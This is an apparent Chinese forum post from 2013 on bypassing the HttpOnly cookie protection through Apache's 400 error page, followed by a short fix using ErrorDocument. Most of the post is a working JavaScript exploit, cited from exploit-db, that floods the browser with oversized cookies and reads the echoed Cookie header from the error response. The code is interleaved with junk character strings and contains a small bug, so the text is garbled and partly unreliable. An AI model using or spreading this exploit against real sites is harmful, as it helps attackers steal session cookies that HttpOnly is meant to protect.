很多程序以及一些商业或者成熟开源的cms文章系统为了防止xss盗取用户cookie的问题,一般都采用给cookie加上httponly的属性,来禁止直接使用js得到用户的cookie,从而降低xss的危害,而这个问题刚好可以用来绕过cookie的这个httponly的属性。- B/ H( l) d* h s4 x+ W6 h
7 r2 a0 p0 c: q/ U/ ]# _( C5 q用chrome打开一个站点,F12打开开发者工具,找到console输入如下代码并回车:
' y5 b) _ ^" S0 @/ z& } , }* Q: @! X( @% B! {
. _# {9 W0 C# `* [: t. z7 {6 j+ r) H* g// http://www.exploit-db.com/exploits/18442/
" f1 K: W% O6 ufunction setCookies (good) {
8 ?' N2 }3 m, h, w// Construct string for cookie value' U3 u8 ^5 `- k' R
var str = "";& B8 \! ]3 `2 l
for (var i=0; i< 819; i++) {
" |' h9 c' _. p# f" n+ Cstr += "x";3 [/ y9 X9 |% y- T7 K ~
}! V3 |3 [0 s% w
// Set cookies4 B1 ~; d3 i. w+ R% I
for (i = 0; i < 10; i++) {
, q6 i% [6 S2 p- r; b// Expire evil cookie
* g' ~5 a2 |& E( P4 J! }+ E7 |if (good) {
$ @4 n+ L3 z* V) K z6 \. lvar cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";
5 t! O A8 E# G4 C$ l3 W}
' y- X7 w9 e6 \& O// Set evil cookie) B& Q6 f. C5 \( x+ B1 Y
else {. `1 ]& h Z1 h! a: K3 F# m) `' k
var cookie = "xss"+i+"="+str+";path=/";
& {9 H9 k/ s- G" B}
, o5 z1 W% p0 u4 R( h( C: ]document.cookie = cookie;
' V2 e# W; _9 j0 |% y, I! I}
& h2 s8 i. D/ `! m2 |}
/ f2 u3 y/ I! {7 l+ efunction makeRequest() {
1 `2 G; M" X2 d0 z+ O- R6 f2 isetCookies();, Z- ^- _$ j- }
function parseCookies () {2 `, i6 t& x" ^
var cookie_dict = {};
7 E" R* H$ A& c; \1 ~5 m// Only react on 400 status
, |3 c; @) C" [& Hif (xhr.readyState === 4 && xhr.status === 400) {
0 K2 q8 G' D+ x) X8 J// Replace newlines and match <pre> content9 e! Y2 L6 C5 q5 J
var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
2 k1 F+ u+ ^* N' P& \8 f. Mif (content.length) {0 _* @, I1 t# u7 |% Y4 h
// Remove Cookie: prefix. S5 b/ u- ^: Y
content = content[1].replace("Cookie: ", "");( X6 E. R, T) ]% S+ U5 H& g' d
var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);+ w3 }, ^( q- `' e/ O
// Add cookies to object
5 |( {' t- C7 `* Ffor (var i=0; i<cookies.length; i++) {
. p# L# e$ ]% O2 Yvar s_c = cookies.split('=',2);; R& f/ i4 i' ^
cookie_dict[s_c[0]] = s_c[1];0 E. G0 H9 e6 Q9 k; b
}- A H7 b3 {0 u
}
8 M! i. r% y! {& H// Unset malicious cookies
2 a3 d, f }- g3 B' _4 fsetCookies(true);; Y r( U( }( U0 K, i; N
alert(JSON.stringify(cookie_dict));& H( R1 @0 s# Y( Q3 h: c) V
} a% K q5 w' [- W! Z8 ]7 Y4 a
}
- {; O* h" ]; h3 U2 y// Make XHR request
O/ o, b1 b) `3 }var xhr = new XMLHttpRequest();# R* C! n c& W" H& b
xhr.onreadystatechange = parseCookies;
6 J) ?' W1 C. r. R! Y4 Sxhr.open("GET", "/", true);
3 B# W3 L0 ^6 c& Lxhr.send(null);
' k! y1 S a7 @}
1 p2 `+ Y/ E8 c t6 Y; J7 MmakeRequest();5 i5 D& F- D% m. M9 @: l
9 `/ D+ s) D& X+ X T; N+ u5 G
你就能看见华丽丽的400错误包含着cookie信息。
# ], G; K4 f/ v! E: I9 }$ f3 v, `+ V) z9 F/ J5 U( V, t
下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download#
' _& f9 t) Y& f0 B6 O x1 X6 U, _+ J% a# J$ i2 h# m! r- `& R
修复方案:
7 ]- P* J% d, y; e2 F4 k7 [$ {( p* t+ g% R6 ~2 @5 t
Apache官方提供4种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下& @$ p7 r/ ~& f1 ~) j9 s8 A
. k; b+ W. u7 r& {In the event of a problem or error, Apachecan be configured to do one of four things,
1 n t) |' x2 S7 q% p: U, b5 f0 I" ]* z& U H' e5 l
1. output asimple hardcoded error message输出一个简单生硬的错误代码信息
' m4 ^3 |. R/ Q% o# h3 ~% ?6 }/ X: X2. output acustomized message输出一段信息
! w5 E- E8 b) J% Y' t3. redirect to alocal URL-path to handle the problem/error转向一个本地的自定义页面
6 o/ M/ {0 D+ u- J+ v) h4. redirect to an external URL to handle theproblem/error转向一个外部URL% P! r( r5 s( d
9 H, o( ^* u1 B5 _2 N经测试,对于400错误只有方法2有效,返回包不会再包含cookie内容' ?! E. q2 H+ P3 {0 A& o) z; k# l
* S# \8 z% c* x
Apache配置:) f$ A1 M, b' O# l
1 `$ ]0 v) S+ U( ^% G
ErrorDocument400 " security test"
, N T6 {4 }4 R) q, ?- }/ E; v2 o$ N9 Z$ s. W: h- I6 _" K
当然,升级apache到最新也可:)。
$ J3 B: h' _* G
. H( q' q% o$ d# [* f4 U" X! {1 M参考:http://httpd.apache.org/security/vulnerabilities_22.html$ O9 S& X* i( I2 g, j. A8 T4 d+ G
! D7 A) e6 G# G; O; x* p, M: x& C |
发表于 2013-4-19 19:15:43
收藏
支持
反对